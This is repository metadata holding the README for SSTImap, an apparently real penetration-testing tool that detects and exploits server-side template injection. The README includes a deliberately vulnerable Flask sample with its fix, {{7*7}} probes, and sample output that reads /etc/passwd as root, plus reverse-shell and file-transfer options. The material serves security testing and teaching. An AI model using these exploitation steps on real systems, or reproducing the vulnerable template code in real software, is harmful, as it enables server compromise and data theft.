{"id":13633404,"url":"https://github.com/vladko312/SSTImap","last_synced_at":"2025-04-18T10:34:41.773Z","repository":{"id":51108156,"uuid":"503642648","full_name":"vladko312/SSTImap","owner":"vladko312","description":"Automatic SSTI detection tool with interactive interface","archived":false,"fork":false,"pushed_at":"2024-08-28T22:36:48.000Z","size":116,"stargazers_count":737,"open_issues_count":15,"forks_count":87,"subscribers_count":13,"default_branch":"master","last_synced_at":"2024-08-28T23:31:38.529Z","etag":null,"topics":["information-security","penetration-testing","penetration-testing-tools","pentest","pentest-tool","pentesting","pentesting-tools","python","rce","ssti"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/vladko312.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-06-15T06:27:32.000Z","updated_at":"2024-08-28T22:36:47.000Z","dependencies_parsed_at":"2024-01-06T23:25:23.918Z","dependency_job_id":"ee7f42a0-5646-49a1-b1ac-921ab9ea931e","html_url":"https://github.com/vladko312/SSTImap","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/vladko312%2FSSTImap/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/vladko312","download_url":"https://codeload.github.com/vladko312/SSTImap/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":223779716,"owners_count":17201220,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["information-security","penetration-testing","penetration-testing-tools","pentest","pentest-tool","pentesting","pentesting-tools","python","rce","ssti"],"created_at":"2024-08-01T23:00:37.027Z","updated_at":"2024-11-09T02:32:00.477Z","avatar_url":"https://github.com/vladko312.png","language":"Python","readme":"SSTImap\n======\n\n[![Version 1.2](https://img.shields.io/badge/version-1.2-green.svg?logo=github)](https://github.com/vladko312/sstimap)\n[![Python 3.13](https://img.shields.io/badge/python-3.13-blue.svg?logo=python)](https://www.python.org/downloads/release/python-3130/)\n[![Python 3.6](https://img.shields.io/badge/python-3.6+-yellow.svg?logo=python)](https://www.python.org/downloads/release/python-360/)\n[![GitHub](https://img.shields.io/github/license/vladko312/sstimap?color=green\u0026logo=gnu)](https://www.gnu.org/licenses/gpl-3.0.txt)\n[![GitHub last commit](https://img.shields.io/github/last-commit/vladko312/sstimap?color=green\u0026logo=github)](https://github.com/vladko312/sstimap/commits/)\n[![Maintenance](https://img.shields.io/maintenance/yes/2024?logo=github)](https://github.com/vladko312/sstimap)\n\n\u003e This project is based on [Tplmap](https://github.com/epinna/tplmap/).\n\nSSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.\n\nThis tool was developed to be used as an interactive penetration testing tool for SSTI detection and exploitation, which allows more advanced exploitation. More payloads for SSTImap can be found [here](https://github.com/vladko312/extras).\n\nSandbox break-out techniques came from:\n- James Kett's [Server-Side Template Injection: RCE For The Modern Web App][5]\n- Other public researches [\\[1\\]][1] [\\[2\\]][2]\n- Contributions to Tplmap [\\[3\\]][3] [\\[4\\]][4].\n\nThis tool is capable of exploiting some code context escapes and blind injection scenarios. It also supports _eval()_-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.\n\nDifferences with Tplmap\n-----------------------\n\nEven though this software is based on Tplmap's code, backwards compatibility is not provided.\n- Interactive mode (`-i`) allowing for easier exploitation and detection\n- Simple evaluation payloads as response markers in case of payload reflection\n- Added new payloads for generic templates, as well as a way to speed up detection using `--skip-generic`\n- Base language _eval()_-like shell (`-x`) or single command (`-X`) execution\n- Added new payload for _Smarty_ without enabled `{php}{/php}`. Old payload is available as `Smarty_unsecure`.\n- Added new payload for newer versions of _Twig_. Payload for older version is available as `Twig_v1`.\n- User-Agent can be randomly selected from a list of desktop browser agents using `-A`\n- SSL verification can now be enabled using `--verify-ssl`\n- Short versions added to many arguments\n- Some old command line arguments were changed, check `-h` for help\n- Code is changed to use newer python features\n- Burp Suite extension temporarily removed, as _Jython_ doesn't support Python3\n\nServer-Side Template Injection\n------------------------------\n\nThis is an example of a simple website written in Python using [Flask][6] framework and [Jinja2][7] template engine. It integrates user-supplied variable `name` in an unsafe way, as it is concatenated to the template string before rendering.\n\n```python3\nfrom flask import Flask, request, render_template_string\nimport os\n\napp = Flask(__name__)\n\n@app.route(\"/page\")\ndef page():\n name = request.args.get('name', 'World')\n # SSTI VULNERABILITY:\n template = f\"Hello, {name}!\u003cbr\u003e\\n\" \\\n \"OS type: {{os}}\"\n return render_template_string(template, os=os.name)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80)\n```\n\nNot only this way of using templates creates XSS vulnerability, but it also allows the attacker to inject template code, that will be executed on the server, leading to SSTI.\n\n```\n$ curl -g 'https://www.target.com/page?name=John'\nHello John!\u003cbr\u003e\nOS type: posix\n$ curl -g 'https://www.target.com/page?name={{7*7}}'\nHello 49!\u003cbr\u003e\nOS type: posix\n```\n\nUser-supplied input should be introduced in a safe way through rendering context:\n\n```python3\nfrom flask import Flask, request, render_template_string\nimport os\n\napp = Flask(__name__)\n\n@app.route(\"/page\")\ndef page():\n name = request.args.get('name', 'World')\n template = \"Hello, {{name}}!\u003cbr\u003e\\n\" \\\n \"OS type: {{os}}\"\n return render_template_string(template, name=name, os=os.name)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=80)\n```\n\nPredetermined mode\n------------------\n\nSSTImap in predetermined mode is very similar to Tplmap. It is capable of detecting and exploiting SSTI vulnerabilities in multiple different templates.\n\nAfter the exploitation, SSTImap can provide access to code evaluation, OS command execution and file system manipulations.\n\nTo check the URL, you can use `-u` argument:\n\n```\n$ ./sstimap.py -u https://example.com/page?name=John\n\n ╔══════╦══════╦═══════╗ ▀█▀\n ║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═\n ║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __\n ╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \\ / _` | '_ \\\n ╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |\n ╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\\__,_| .__/\n │ | |\n |_|\n[*] Version: 1.2.0\n[*] Author: @vladko312\n[*] Based on Tplmap\n[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n[*] Testing if GET parameter 'name' is injectable \n[*] Smarty plugin is testing rendering with tag '*'\n...\n[*] Jinja2 plugin is testing rendering with tag '{{*}}'\n[+] Jinja2 plugin has confirmed injection with tag '{{*}}'\n[+] SSTImap identified the following injection point:\n\n GET parameter: name\n Engine: Jinja2\n Injection: {{*}}\n Context: text\n OS: posix-linux\n Technique: render\n Capabilities:\n\n Shell command execution: ok\n Bind and reverse shell: ok\n File write: ok\n File read: ok\n Code evaluation: ok, python code\n\n[+] Rerun SSTImap providing one of the following options:\n --os-shell Prompt for an interactive operating system shell\n --os-cmd Execute an operating system command.\n --eval-shell Prompt for an interactive shell on the template engine base language.\n --eval-cmd Evaluate code in the template engine base language.\n --tpl-shell Prompt for an interactive shell on the template engine.\n --tpl-cmd Inject code in the template engine.\n --bind-shell PORT Connect to a shell bind to a target port\n --reverse-shell HOST PORT Send a shell back to the attacker's port\n --upload LOCAL REMOTE Upload files to the server\n --download REMOTE LOCAL Download remote files\n```\n\nUse `--os-shell` option to launch a pseudo-terminal on the target.\n\n```\n$ ./sstimap.py -u https://example.com/page?name=John --os-shell\n\n ╔══════╦══════╦═══════╗ ▀█▀\n ║ ╔════╣ ╔════╩══╗ ╔══╝═╗▀╔═\n ║ ╚════╣ ╚════╗ ║ ║ ║{║ _ __ ___ __ _ _ __\n ╚════╗ ╠════╗ ║ ║ ║ ║*║ | '_ ` _ \\ / _` | '_ \\\n ╔════╝ ╠════╝ ║ ║ ║ ║}║ | | | | | | (_| | |_) |\n ╚══════╩══════╝ ╚═╝ ╚╦╝ |_| |_| |_|\\__,_| .__/\n │ | |\n |_|\n[*] Version: 1.2.0\n[*] Author: @vladko312\n[*] Based on Tplmap\n[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal. \nIt is the end user's responsibility to obey all applicable local, state and federal laws.\nDevelopers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n[*] Testing if GET parameter 'name' is injectable\n[*] Smarty plugin is testing rendering with tag '*'\n...\n[*] Jinja2 plugin is testing rendering with tag '{{*}}'\n[+] Jinja2 plugin has confirmed injection with tag '{{*}}'\n[+] SSTImap identified the following injection point:\n\n GET parameter: name\n Engine: Jinja2\n Injection: {{*}}\n Context: text\n OS: posix-linux\n Technique: render\n Capabilities:\n\n Shell command execution: ok\n Bind and reverse shell: ok\n File write: ok\n File read: ok\n Code evaluation: ok, python code\n\n[+] Run commands on the operating system.\nposix-linux $ whoami\nroot\nposix-linux $ cat /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n```\n\nTo get a full list of options, use `--help` argument.\n\nInteractive mode\n----------------\n\nIn interactive mode, commands are used to interact with SSTImap. To enter interactive mode, you can use `-i` argument. All other arguments, except for the ones regarding exploitation payloads, will be used as initial values for settings.\n\nSome commands are used to alter settings between test runs. To run a test, target URL must be supplied via initial `-u` argument or `url` command. After that, you can use `run` command to check URL for SSTI.\n\nIf SSTI was found, commands can be used to start the exploitation. You can get the same exploitation capabilities, as in the predetermined mode, but you can use `Ctrl+C` to abort them without stopping a program.\n\nBy the way, test results are valid until target url is changed, so you can easily switch between exploitation methods without running detection test every time.\n\nTo get a full list of interactive commands, use command `help` in interactive mode.\n\nSupported template engines\n--------------------------\n\nSSTImap supports multiple template engines and _eval()_-like injections.\n\nNew payloads are welcome in PRs. Check out the [tips](https://github.com/vladko312/extras#developing-plugins) to speed up development.\n\n| Engine | RCE | Blind | Code evaluation | File read | File write |\n|--------------------------------------|-----|-------|-----------------|-----------|------------|\n| Mako | ✓ | ✓ | Python | ✓ | ✓ |\n| Cheetah | ✓ | ✓ | Python | ✓ | ✓ |\n| Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |\n| Tornado | ✓ | ✓ | Python | ✓ | ✓ |\n| Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |\n| Python-based generic templates | ✓ | ✓ | Python | ✓ | ✓ |\n| Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Pug | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| doT | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Dust (\u003c= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| JavaScript-based generic templates | ✓ | ✓ | JavaScript | ✓ | ✓ |\n| Slim | ✓ | ✓ | Ruby | ✓ | ✓ |\n| ERB | ✓ | ✓ | Ruby | ✓ | ✓ |\n| Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |\n| Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |\n| Smarty (secured) | ✓ | ✓ | PHP | ✓ | ✓ |\n| Twig (\u003c=1.19) | ✓ | ✓ | PHP | ✓ | ✓ |\n| Twig (\u003e=2.12 \u003c2.14.11; \u003e=3.0 \u003c3.3.8) | ✓ | ✓ | PHP | ✓ | ✓ |\n| PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |\n| PHP-based generic templates | ✓ | ✓ | PHP | ✓ | ✓ |\n| Freemarker | ✓ | ✓ | Java | ✓ | ✓ |\n| Velocity | ✓ | ✓ | Java | ✓ | ✓ |\n| Twig (\u003e1.19 \u003c2.0) | × | × | × | × | × |\n| Dust (\u003e dustjs-helpers@1.5.0) | × | × | × | × | × |\nMore plugins and payloads can be found in [SSTImap Extra Plugins](https://github.com/vladko312/extras) repository.\n\nBurp Suite Plugin\n-----------------\n\nCurrently, Burp Suite only works with Jython as a way to execute python2. Python3 functionality is not provided.\n\nFuture plans\n------------\n\nIf you plan to contribute something big from this list, inform me to avoid working on the same thing as me or other contributors.\n\n- [ ] Add more payloads for different engines\n- [ ] Parse raw HTTP request from file\n- [ ] Variable dumping functionality\n- [ ] Blind/side-channel value extraction\n- [ ] Better documentation (or at least any documentation)\n- [ ] Short arguments as interactive commands?\n- [ ] JSON/plaintext API modes for scripting integrations?\n- [ ] Better integration for Python scripts\n- [ ] Multipart POST data type support\n- [ ] Modules for more customisable requests (second order, reset, non-HTTP)\n- [ ] Payload processing scripts\n- [ ] Better config functionality\n- [ ] Saving found vulnerabilities\n- [ ] Reports in HTML or other format\n- [ ] Multiline language evaluation?\n- [ ] Avoid platform dependency in payloads\n- [ ] Update NodeJS payloads as process.mainModule may be undefined\n- [x] Spider/crawler automation (by [fantesykikachu](https://github.com/fantesykikachu))\n- [x] Automatic languages and engines import\n- [x] More POST data types support\n- [x] Make template and base language evaluation functionality more uniform\n- [x] Argument to remove escape codes?\n\n[1]: https://artsploit.blogspot.co.uk/2016/08/pprce2.html\n[2]: https://opsecx.com/index.php/2016/07/03/server-side-template-injection-in-tornado/\n[3]: https://github.com/epinna/tplmap/issues/9\n[4]: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine\n[5]: http://blog.portswigger.net/2015/08/server-side-template-injection.html\n[6]: http://flask.pocoo.org/\n[7]: http://jinja.pocoo.org/\n","funding_links":[],"categories":["Weapons","Miscellaneous","红队\u0026渗透测试"],"sub_categories":["Tools","Vulnerability Scanners"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvladko312%2FSSTImap","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fvladko312%2FSSTImap","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fvladko312%2FSSTImap/lists"}